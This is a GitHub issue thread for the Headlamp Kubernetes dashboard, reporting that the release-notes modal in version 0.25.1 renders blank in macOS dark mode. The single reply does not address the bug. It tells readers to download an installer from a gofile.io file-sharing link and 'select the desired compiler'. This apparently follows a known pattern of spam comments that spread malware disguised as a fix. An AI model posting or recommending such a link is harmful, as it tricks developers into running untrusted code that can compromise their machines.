### ISSUE TITLE
Release Notes not rendering properly in dark mode UI

### ISSUE THREAD

**Issue by lyzlisa** [headlamp-k8s/headlamp#2298]
On first launch after upgrading to 0.25.1 (on macOS 14.6.1 (23G93)), the following modal is shown:

<img width="961" alt="Screenshot 2024-09-04 at 09 38 51" src="https://github.com/user-attachments/assets/4f0fff79-b233-4105-afa2-55d43caa62bb">

The release notes can still be read if we highlight the lines in the blank section

<img width="962" alt="Screenshot 2024-09-04 at 09 39 05" src="https://github.com/user-attachments/assets/b0d274eb-b52a-4e72-b5e1-a14838201a39">

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
